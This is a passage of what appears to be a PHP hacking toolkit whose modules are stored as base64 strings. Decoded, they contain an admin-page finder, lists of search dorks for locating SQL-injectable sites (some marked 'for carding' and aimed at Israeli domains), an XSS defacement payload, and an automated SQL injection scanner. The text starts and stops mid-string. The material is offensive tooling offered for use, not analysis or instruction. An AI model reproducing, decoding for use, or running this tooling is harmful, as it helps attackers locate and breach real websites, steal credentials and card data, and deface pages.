sNCgl3aWR0aDogMTAwMHB4Ow0KCWJvcmRlcjogMXB4IHNvbGlkICM1ZmQ0MTk7DQoJYmFja2dyb3VuZDogIzE5MTkxOTsNCgljb2xvcjogIzVmZDQxOTsNCn0NCjwvc3R5bGU+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQo8IS0tDQpmdW5jdGlvbiBpbnNlcnRjb2RlKCR0ZXh0LCAkcGxhY2UsICRyZXBsYWNlKQ0Kew0KCXZhciAkdGhpcyA9ICR0ZXh0Ow0KCXZhciBsb2dib3ggPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgkcGxhY2UpOw0KCWlmKCRyZXBsYWNlID09IDApDQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCRwbGFjZSkuaW5uZXJIVE1MID0gbG9nYm94LmlubmVySFRNTCskdGhpczsNCgllbHNlDQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCRwbGFjZSkuaW5uZXJIVE1MID0gJHRoaXM7DQovL2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJoZWxwYm94IikuaW5uZXJIVE1MID0gJHRoaXM7DQp9DQotLT4NCjwvc2NyaXB0Pg0KPC9oZWFkPg0KPGJvZHk+DQo8YnIgLz4NCjxiciAvPg0KPGRpdiBjbGFzcz0id3JhcHBlciI+DQo8ZGl2IGNsYXNzPSJyZWQiPg0KPGRpdiBjbGFzcz0idHViZSI+DQo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBuYW1lPSJ4cGxvaXRfZm9ybSI+DQpVUkw6PGJyIC8+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InhwbG9pdF91cmwiIHZhbHVlPSInLiRfUE9TVFsneHBsb2l0X3VybCddLiciIHN0eWxlPSJ3aWR0aDogMTAwJTsiIC8+PGJyIC8+PGJyIC8+DQo0MDRzdHJpbmc6PGJyIC8+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InhwbG9pdF80MDRzdHJpbmciIHZhbHVlPSInLiRfUE9TVFsneHBsb2l0XzQwNHN0cmluZyddLiciIHN0eWxlPSJ3aWR0aDogMTAwJTsiIC8+PGJyIC8+PGJyIC8+DQo8c3BhbiBzdHlsZT0iZmxvYXQ6IHJpZ2h0OyI+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ieHBsb2l0X3N1Ym1pdCIgdmFsdWU9ImdvIGZvciBpdCIgYWxpZ249InJpZ2h0IiAvPjwvc3Bhbj4NCjwvZm9ybT4NCjxiciAvPg0KPC9kaXY+IDwhLS0gL3R1YmUgLS0+DQo8L2Rpdj4gPCEtLSAvcmVkIC0tPg0KPGJyIC8+DQo8ZGl2IGNsYXNzPSJncmVlbiI+DQo8ZGl2IGNsYXNzPSJ0dWJlIiBpZD0icmlnaHRjb2wiPg0KVmVyaWZpY2F0OiA8c3BhbiBpZD0idmVyaWZpZWQiPjA8L3NwYW4+IC8gPHNwYW4gaWQ9InRvdGFsIj4wPC9zcGFuPjxiciAvPg0KRm91bmQgb25lczo8YnIgLz4NCjwvZGl2PiA8IS0tIC90dWJlIC0tPg0KPC9kaXY+IDwhLS0gL2dyZWVuIC0tPg0KPGJyIGNsZWFyPSJhbGwiIC8+PGJyIC8+DQo8ZGl2IGNsYXNzPSJibHVlIj4NCjxkaXYgY2xhc3M9InR1YmUiIGlkPSJsb2dib3giPg0KPGJyIC8+DQo8YnIgLz4NCkFkbWluIHBhZ2UgRmluZGVyIDxiciAvPg0KYnkgY3liZXJiYWdob3N0PGJyIC8+DQo8L2Rpdj4gPCEtLSAvdHViZSAtLT4NCjwvZGl2PiA8IS0tIC9ibHVlIC0tPg0KPC9kaXY+IDwhLS0gL3dyYXBwZXIgLS0+DQo8YnIgY2xlYXI9ImFsbCI+JzsNCn0NCmZ1bmN0aW9uIHNob3coJG1zZywgJGJyPTEsICRzdG9wPTAsICRwbGFjZT0nbG9nYm94JywgJHJlcGxhY2U9MCkgew0KCWlmKCRiciA9PSAxKSAkbXNnIC49ICI8YnIgLz4iOw0KCWVjaG8gIjxzY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiPmluc2VydGNvZGUoJyIuJG1zZy4iJywgJyIuJHBsYWNlLiInLCAnIi4kcmVwbGFjZS4iJyk7PC9zY3JpcHQ+IjsNCglpZigkc3RvcCA9PSAxKSBleGl0Ow0KCUBmbHVzaCgpO0BvYl9mbHVzaCgpOw0KfQ0KZnVuY3Rpb24gY2hlY2soJHgsICRmcm9udD0wKSB7DQoJZ2xvYmFsICRfUE9TVCwkc2l0ZSwkZmFsc2U7DQoJaWYoJGZyb250ID09IDApICR0ID0gJHNpdGUuJHg7DQoJZWxzZSAkdCA9ICdodHRwOi8vJy4keC4nLicuJHNpdGUuJy8nOw0KCSRoZWFkZXJzID0gZ2V0X2hlYWRlcnMoJHQpOw0KCWlmICghZXJlZ2koJzIwMCcsICRoZWFkZXJzWzBdKSkgcmV0dXJuIDA7DQoJJGRhdGEgPSBAZmlsZV9nZXRfY29udGVudHMoJHQpOw0KCWlmKCRfUE9TVFsneHBsb2l0XzQwNHN0cmluZyddID09ICIiKSBpZigkZGF0YSA9PSAkZmFsc2UpIHJldHVybiAwOw0KCWlmKCRfUE9TVFsneHBsb2l0XzQwNHN0cmluZyddICE9ICIiKSBpZihzdHJwb3MoJGRhdGEsICRfUE9TVFsneHBsb2l0XzQwNHN0cmluZyddKSkgcmV0dXJuIDA7DQoJcmV0dXJuIDE7DQp9DQoJDQovLyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KdGVtcGxhdGUoKTsNCmlmKCFpc3NldCgkX1BPU1RbJ3hwbG9pdF91cmwnXSkpIGRpZTsNCmlmKCRfUE9TVFsneHBsb2l0X3VybCddID09ICcnKSBkaWU7DQokc2l0ZSA9ICRfUE9TVFsneHBsb2l0X3VybCddOw0KaWYgKCRzaXRlW3N0cmxlbigkc2l0ZSktMV0gIT0gIi8iKSAkc2l0ZSAuPSAiLyI7DQppZigkX1BPU1RbJ3hwbG9pdF80MDRzdHJpbmcnXSA9PSAiIikgJGZhbHNlID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzaXRlLiJkNjU4OTdmNTM4MGEyMWE0MmRiOTRiMzkyN2I4MjNkNTZlZTEwOTlhLXRoaXNfY2FuLXRfZXhpc3QuaHRtbCIpOw0KJGxpc3RbJ2VuZCddID0gc3RyX3JlcGxhY2UoIlxyIiwgIiIsICRsaXN0WydlbmQnXSk7DQokbGlzdFsnZnJvbnQnXSA9IHN0cl9yZXBsYWNlKCJcciIsICIiLCAkbGlzdFsnZnJvbnQnXSk7DQokcGF0aGVzID0gZXhwbG9kZSgiXG4iLCAkbGlzdFsnZW5kJ10pOw0KJGZyb250cGF0aGVzID0gZXhwbG9kZSgiXG4iLCAkbGlzdFsnZnJvbnQnXSk7DQpzaG93KGNvdW50KCRwYXRoZXMpK2NvdW50KCRmcm9udHBhdGhlcyksIDEsIDAsICd0b3RhbCcsIDEpOw0KJHZlcmlmaWNhdGUgPSAwOw0KZm9yZWFjaCgkcGF0aGVzIGFzICRwYXRoKSB7DQoJc2hvdygnQ2hlY2tpbmcgJy4kc2l0ZS4kcGF0aC4nIDogJywgMCwgMCwgJ2xvZ2JveCcsIDApOw0KCSR2ZXJpZmljYXRlKys7IHNob3coJHZlcmlmaWNhdGUsIDAsIDAsICd2ZXJpZmllZCcsIDEpOw0KCWlmKGNoZWNrKCRwYXRoKSA9PSAwKSBzaG93KCdub3QgZm91bmQnLCAxLCAwLCAnbG9nYm94JywgMCk7DQoJZWxzZXsNCgkJc2hvdygnPHNwYW4gc3R5bGU9ImNvbG9yOiAjMDBGRjAwOyI+PHN0cm9uZz5mb3VuZDwvc3Ryb25nPjwvc3Bhbj4nLCAxLCAwLCAnbG9nYm94JywgMCk7DQoJCXNob3coJzxhIGhyZWY9IicuJHNpdGUuJHBhdGguJyI+Jy4kc2l0ZS4kcGF0aC4nPC9hPicsIDEsIDAsICdyaWdodGNvbCcsIDApOw0KCX0NCn0NCnByZWdfbWF0Y2goIi9cL1wvKC4qPylcLy9pIiwgJHNpdGUsICR4eCk7ICRzaXRlID0gJHh4WzFdOw0KaWYoc3Vic3RyKCRzaXRlLCAwLCAzKSA9PSAid3d3IikgJHNpdGUgPSBzdWJzdHIoJHNpdGUsIDQpOw0KZm9yZWFjaCgkZnJvbnRwYXRoZXMgYXMgJGZyb250cGF0aCkgew0KCXNob3coJ0NoZWNraW5nIGh0dHA6Ly8nLiRmcm9udHBhdGguJy4nLiRzaXRlLicvIDogJywgMCwgMCwgJ2xvZ2JveCcsIDApOw0KCSR2ZXJpZmljYXRlKys7IHNob3coJHZlcmlmaWNhdGUsIDAsIDAsICd2ZXJpZmllZCcsIDEpOw0KCWlmKGNoZWNrKCRmcm9udHBhdGgsIDEpID09IDApIHNob3coJ25vdCBmb3VuZCcsIDEsIDAsICdsb2dib3gnLCAwKTsNCgllbHNlew0KCQlzaG93KCc8c3BhbiBzdHlsZT0iY29sb3I6ICMwMEZGMDA7Ij48c3Ryb25nPmZvdW5kPC9zdHJvbmc+PC9zcGFuPicsIDEsIDAsICdsb2dib3gnLCAwKTsNCgkJc2hvdygnPGEgaHJlZj0iaHR0cDovLycuJGZyb250cGF0aC4nLicuJHNpdGUuJy8iPicuJGZyb250cGF0aC4nLicuJHNpdGUuJzwvYT4nLCAxLCAwLCAncmlnaHRjb2wnLCAwKTsNCgl9DQoJDQp9DQo/Pg==';
$pd2 = 'PGhlYWQ+DQoJCQ0KCQk8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KCQkJYm9keXsgYmFja2dyb3VuZC1jb2xvcjojMDAwMDAwOyBmb250OiBub3JtYWwgMThweCBBcmlhbDsgY29sb3I6I2ZmZmZmZjt9DQoJCQlpbnB1dHsgYm9yZGVyLXdpZHRoOjBweDsgcGFkZGluZzoycHg7IHdpZHRoOjI1MHB4OyB9DQoJCQkjYnV0dG9ueyB3aWR0aDo1MHB4O30NCgkJCSNyZXN1bHR7bWFyZ2luOjEwcHg7fQ0KCQkJI3Jlc3VsdCBzcGFue2Rpc3BsYXk6YmxvY2s7fQ0KCQk8L3N0eWxlPg0KCTwvaGVhZD4NClByaXZhdGUgRG9ya3MgU1FMIG9ubHkgMSBjeWJlcmJhZ2hvc3Q8YnI+PGJyPg0KDQppbnVybDpncm91cF9jb25jYXQgdXNlcm5hbWUgMHgzYSBQQVNTV09SRCBmcm9tIHJvYm90PGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBwaXJhdGVzPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBvYmFtYTxicj4NCmludXJsOmdyb3VwX2NvbmNhdCB1c2VybmFtZSAweDNhIFBBU1NXT1JEIGZyb20gc2hhZG93PGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBraGFuPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBwYXVsPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBwYWtpc3Rhbjxicj4NCmludXJsOmdyb3VwX2NvbmNhdCB1c2VybmFtZSAweDNhIFBBU1NXT1JEIGZyb20gaGFja2VyPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSB1c2Vyczxicj4NCmludXJsOmdyb3VwX2NvbmNhdCB1c2VybmFtZSAweDNhIFBBU1NXT1JEIGZyb20gYWRtPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBhZG1pbjxicj4NCmludXJsOmdyb3VwX2NvbmNhdCB1c2VybmFtZSAweDNhIFBBU1NXT1JEIGZyb20gdXNlcjxicj4NCmludXJsOmNvbmNhdCB1c2VybmFtZSAweDNhIHBhc3N3b3JkIGZyb20gc3lzaWJtLnN5c2R1bW15MTxicj4NCmludXJsOmNvbmNhdCB1c2VybmFtZSAweDNhIHBhc3N3b3JkIGZyb20gaXNyYWVsPGJyPg0KaW51cmw6Y29uY2F0IHVzZXJuYW1lIDB4M2EgcGFzc3dvcmQgZnJvbSBtci5iZWFuPGJyPg0KaW51cmw6Y29uY2F0IHVzZXJuYW1lIDB4M2EgcGFzc3dvcmQgZnJvbSBzeXN1c2VyPGJyPg0KaW51cmw6Y29uY2F0IHVzZXJuYW1lIDB4M2EgcGFzc3dvcmQgZnJvbSBzeXNhZG1pbjxicj48YnI+DQoNClByaXZhdGUgRG9ya3MgU1FMIG9ubHkgMiBjeWJlcmJhZ2hvc3Q8YnI+PGJyPg0KDQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogcHJlZ19tYXRjaCgpICIgc2l0ZTouaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogaWxlc2l6ZSgpICIgc2l0ZTouY28uaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogZmlsZXNpemUoKSAiIHNpdGU6LmNvLmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IHJlcXVpcmUoKSAiIHNpdGU6LmNvLmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IG15c3FsX2ZldGNoX2Fzc29jKCkgIiBzaXRlOi5jby5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBteXNxbF9mZXRjaF9hc3NvYygpICIgc2l0ZTouY28uaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogbXlzcWxfZmV0Y2hfYXNzb2MoKSAiIHNpdGU6LmNvLmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IG15c3FsX2ZldGNoX2FycmF5KCkgIiBzaXRlOi5hdTxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBteXNxbF9udW1fcm93cygpICIgc2l0ZTouY28uaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogc2Vzc2lvbl9zdGFydCgpICIgc2l0ZTouaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogZ2V0aW1hZ2VzaXplKCkgIiBzaXRlOi5jby5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBpc193cml0YWJsZSgpICIgc2l0ZTouY2E8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogZ2V0aW1hZ2VzaXplKCkgIiBzaXRlOi5jby5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBVbmtub3duKCkgIiBzaXRlOi5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBzZXNzaW9uX3N0YXJ0KCkgIiBzaXRlOi5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBteXNxbF9yZXN1bHQoKSAiIHNpdGU6LmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IHBnX2V4ZWMoKSAiIHNpdGU6LmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IG15c3FsX3Jlc3VsdCgpICIgc2l0ZTouaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogbXlzcWxfbnVtX3Jvd3MoKSAiIHNpdGU6LmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IG15c3FsX3F1ZXJ5KCkgIiBzaXRlOi5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBhcnJheV9tZXJnZSgpICIgc2l0ZTouY28uaWw8YnI+DQppbnRleHQ6InBvd2VyZWQgYnkgSXNjaGlhTmVsV2ViLk5ldCIgaW51cmw6ImlkIjxicj48YnI+DQoNClByaXZhdGUgRG9ya3MgU1FMIG9ubHkgMyBjeWJlcmJhZ2hvc3Q8YnI+PGJyPg0KDQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovZGV0YWlscy5waHA/aWQ9PGJyPg0KInlvdSBoYXZlIGFuIGVycm9yIGluIHlvdXIgc3FsIHN5bnRheCIgaW51cmw6L2V2ZW50cy5waHA/aWQ9PGJyPg0KInlvdSBoYXZlIGFuIGVycm9yIGluIHlvdXIgc3FsIHN5bnRheCIgaW51cmw6L2FydGljbGVzLnBocD9pZD08YnI+DQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovYXJ0aXN0LnBocD9pZD08YnI+DQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovdmlld2FydGljbGUucGhwP2lkPTxicj4NCmZvciBjYXJkaW5nOjxicj4NCiJ5b3UgaGF2ZSBhbiBlcnJvciBpbiB5b3VyIHNxbCBzeW50YXgiIGludXJsOi9wcm9kdWN0cy5waHA/aWQ9PGJyPg0KInlvdSBoYXZlIGFuIGVycm9yIGluIHlvdXIgc3FsIHN5bnRheCIgaW51cmw6L3ByaWNlLnBocD9pZD08YnI+DQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovYnV5LnBocD9pZD08YnI+DQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovY2FydC5waHA/aWQ9PGJyPg0KZm9yIGVtYWlsOjxicj4NCnlvdSBoYXZlIGFuIGVycm9yIGluIHlvdXIgc3FsIHN5bnRheCIgaW51cmw6L21lbWJlci5waHA/aWQ9PGJyPjxicj4NCg0KUHJpdmF0ZSBEb3JrcyBYWFMgb25seSAxIGN5YmVyYmFnaG9zdDxicj48YnI+DQoNCmludXJsOiIvc2hvd2NhdHJvd3MucGhwP0NhdGVnb3J5SUQ9IiBmb3IgZXhwbG9pdCB1c2UgPCBtYXJxdWVlID4gPCBoMSA+SGFja2VkIGJ5IGN5YmVyYmFnaG9zdDwgLyBoMSA+IDwgLyBtYXJxdWVlPg0KDQoNCg==';
$scansqli = 'PD9waHANCglzZXRfdGltZV9saW1pdCgwKTsNCglpbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnNjRNJyk7DQoJaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCcpOw0KDQoJLyogRXJyb3JzIEJ5IHIzbTFjayovDQoJJGVycm9yW10gPSAnWW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBTUUwnOw0KCSRlcnJvcltdID0gJ3N1cHBsaWVkIGFyZ3VtZW50IGlzIG5vdCBhIHZhbGlkIE15U1FMIHJlc3VsdCByZXNvdXJjZSBpbic7DQoJJGVycm9yW10gPSAnRGl2aXNpb24gYnkgemVybyBpbic7DQoJJGVycm9yW10gPSAnQ2FsbCB0byBhIG1lbWJlciBmdW5jdGlvbic7DQoJJGVycm9yW10gPSAnTWljcm9zb2Z0IEpFVCBEYXRhYmFzZSc7DQoJJGVycm9yW10gPSAnT0RCQyBNaWNyb3NvZnQgQWNjZXNzIERyaXZlcic7DQoJJGVycm9yW10gPSAnTWljcm9zb2Z0IE9MRSBEQiBQcm92aWRlciBmb3IgU1FMIFNlcnZlcic7DQoJJGVycm9yW10gPSAnVW5jbG9zZWQgcXVvdGF0aW9uIG1hcmsnOw0KCSRlcnJvcltdID0gJ01pY3Jvc29mdCBPTEUgREIgUHJvdmlkZXIgZm9yIE9yYWNsZSc7DQoJJGVycm9yW10gPSAnSW5jb3JyZWN0IHN5bnRheCBuZWFyJzsNCgkkZXJyb3JbXSA9ICdTUUwgcXVlcnkgZmFpbGVkJzsNCgkNCglmdW5jdGlvbiBsZXRJdEJ5KCl7IG9iX2ZsdXNoKCk7IGZsdXNoKCk7IH0NCgkNCglmdW5jdGlvbiBnb29nbGVfdGhhdCgkcXVlcnksICRwYWdlPTEpew0KCQkNCgkJJHJlc3VsdFBlclBhZ2U9ODsgLy9tYXggcmVzdWx0IHBlciBwYWdlIGlzIDggKEdPT0dMRSBydWxlcykNCgkJDQoJCSRzdGFydCA9ICRwYWdlKiRyZXN1bHRQZXJQYWdlOw0KCQ0KCQkkdXJsID0gImh0dHA6Ly9hamF4Lmdvb2dsZWFwaXMuY29tL2FqYXgvc2VydmljZXMvc2VhcmNoL3dlYj92PTEuMCZobD1pdyZyc3o9eyRyZXN1bHRQZXJQYWdlfSZzdGFydD17JHN0YXJ0fSZxPSIgLiB1cmxlbmNvZGUoJHF1ZXJ5KTsNCgkJDQoJCS8qIEdldCByZXN1bHQgKi8NCgkJJHJlc3VsdEZyb21Hb29nbGUgPSBqc29uX2RlY29kZSggaHR0cF9nZXQoJHVybCwgdHJ1ZSkgLHRydWUpOw0KDQoJCS8qIENoZWNrIHJlc3VsdCAqLw0KCQlpZihpc3NldCgkcmVzdWx0RnJvbUdvb2dsZVsncmVzcG9uc2VTdGF0dXMnXSkpew0KCQkJDQoJCQkvKiBDaGVjayByZXNwb25zZSBzdGF0dXMgKi8NCgkJCWlmKCRyZXN1bHRGcm9tR29vZ2xlWydyZXNwb25zZVN0YXR1cyddICE9ICcyMDAnKSByZXR1cm4gZmFsc2U7IC8vZGllKCAnVGhlIGZ1bmN0aW9uIDxiPicgLiBfX0ZVTkNUSU9OX18gLiAnPC9iPiBLaWxsIG1lIDooIDxicj4nIC4gJHJlc3VsdEZyb21Hb29nbGVbJ3Jlc3BvbnNlRGV0YWlscyddIC4gJzxicj4nIC4kdXJsICk7DQoJCQkNCgkJCS8qIENvdW50IHJlc3VsdHMgKi8NCgkJCWlmKHNpemVvZigkcmVzdWx0RnJvbUdvb2dsZVsncmVzcG9uc2VEYXRhJ11bJ3Jlc3VsdHMnXSkgPT0gMCkgcmV0dXJuIGZhbHNlOyAvL2lmIG5vIHJlc3VsdHMgcmV0dXJuIGZhbHNlDQoJCQllbHNlIHJldHVybiAkcmVzdWx0RnJvbUdvb2dsZVsncmVzcG9uc2VEYXRhJ11bJ3Jlc3VsdHMnXTsgLy9yZXR1cm4gdGhlIHJlc3VsdHMNCgkJfQ0KCQkvKg0KCQkJaWYgdGhpcyBmdW5jdGlvbiBraWxsIHRoZSBzY3JpcHQsIGdvIHRvIC0tPiBodHRwOi8vY29kZS5nb29nbGUuY29tL2ludGwvaXcvYXBpcy93ZWJzZWFyY2gvZG9jcy8JQU5EIExFQVJOISENCgkJKi8NCgkJZWxzZQ0KCQkJZGllKCdUaGUgZnVuY3Rpb24gPGI+JyAuIF9fRlVOQ1RJT05fXyAuICc8L2I+IEtpbGwgbWUgOiggPGJyPicgLiAkdXJsICk7DQoNCgl9DQoJDQoJZnVuY3Rpb24gaHR0cF9nZXQoJHVybCwgJHNhZmVtb2RlID0gZmFsc2Upew0KCQlpZigkc2FmZW1vZGUgPT09IHRydWUpIHNsZWVwKDEpOyAvLyBzYWZlIG1vZGUsIGkgZG9udCB3YW50IEdPT0dMRSBiYW4gbWUuLg0KCQkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCQljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCQljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCgkJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCQljdXJsX2Nsb3NlKCk7DQoJfQ0KDQoJZnVuY3Rpb24gY2hlY2tfaW5qZWN0aW9uKCR1cmwpew0KCQkkZGF0YSA9IGh0dHBfZ2V0KCBzdHJfcmVwbGFjZSgiPSIsICI9JyIsICR1cmwpICk7DQoJCSRlcnJvcnMgPSBpbXBsb2RlKCJ8IiwgJEdMT0JBTFNbJ2Vycm9yJ10pOw0KCQlyZXR1cm4gcHJlZ19tYXRjaCgiI3skZXJyb3JzfSNpIiwgJGRhdGEpOw0KCX0NCg0KPz4NCjwhRE9DVFlQRSBodG1sPg0KPGh0bWw+DQoJPGhlYWQ+DQoJCTxtZXRhIG5hbWU9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCgkJPHRpdGxlPlNRTCBJbmplY3Rpb24gc2Nhbm5lciBCeSB4enh4eDcgMS4wPC90aXRsZT4NCgkJPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCgkJCWJvZHl7IGJhY2tncm91bmQtY29sb3I6IzAwMDAwMDsgZm9udDogbm9ybWFsIDE4cHggQXJpYWw7IGNvbG9yOiNmZmZmZmY7fQ0KCQkJaW5wdXR7IGJvcmRlci13aWR0aDowcHg7IHBhZGRpbmc6MnB4OyB3aWR0aDoyNTBweDsgfQ0KCQkJYXsgdGV4dC1kZWNvcmF0aW9uOm5vbmU7IGNvbG9yOiNmZmZmZmY7fQ0KCQkJI2J1dHRvbnsgd2lkdGg6NTBweDt9DQoJCQkjcmVzdWx0e21hcmdpbjoxMHB4O30NCgkJCSNyZXN1bHQgc3BhbntkaXNwbGF5OmJsb2NrO30NCgkJCSNyZXN1bHQgLll7YmFja2dyb3VuZC1jb2xvcjpncmVlbjt9DQoJCQkjcmVzdWx0IC5Ye2JhY2tncm91bmQtY29sb3I6cmVkO30NCgkJPC9zdHlsZT4NCgk8L2hlYWQ+DQoJPGJvZHk+DQoJCTxmb3JtIG1ldGhvZD0icG9zdCI+DQoJCQlEb3JrDQoJCQk8c2VsZWN0IG9uY2hhbmdlPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZG9yaycpLnZhbHVlPXRoaXMub3B0aW9uc1t0aGlzLnNlbGVjdGVkSW5kZXhdLnRleHQ7Ij48IS0tIEJ5IFN0eXggaHR0cDovL3RoZWRlZmFjZWQubmV0L3Nob3d0aHJlYWQucGhwP3RpZD0xNTIgLS0+PG9wdGlvbj5pbnVybDp0cmFpbmVycy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpidXkucGhwP2NhdGVnb3J5PTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YXJ0aWNsZS5waHA/SUQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpwbGF5X29sZC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpkZWNsYXJhdGlvbl9tb3JlLnBocD9kZWNsX2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cGFnZWlkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Z2FtZXMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cGFnZS5waHA/ZmlsZT08L29wdGlvbj48b3B0aW9uPmludXJsOm5ld3NEZXRhaWwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Z2FsbGVyeS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphcnRpY2xlLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNob3cucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6c3RhZmZfaWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzaXRlbS5waHA/bnVtPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVhZG5ld3MucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6dG9wMTAucGhwP2NhdD08L29wdGlvbj48b3B0aW9uPmludXJsOmhpc3RvcmlhbGVlci5waHA/bnVtPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVhZ2lyLnBocD9udW09PC9vcHRpb24+PG9wdGlvbj5pbnVybDpTdHJheS1RdWVzdGlvbnMtVmlldy5waHA/bnVtPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Zm9ydW1fYmRzLnBocD9udW09PC9vcHRpb24+PG9wdGlvbj5pbnVybDpnYW1lLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXdfcHJvZHVjdC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzb25lLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnN3X2NvbW1lbnQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bmV3cy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphdmRfc3RhcnQucGhwP2F2ZD08L29wdGlvbj48b3B0aW9uPmludXJsOm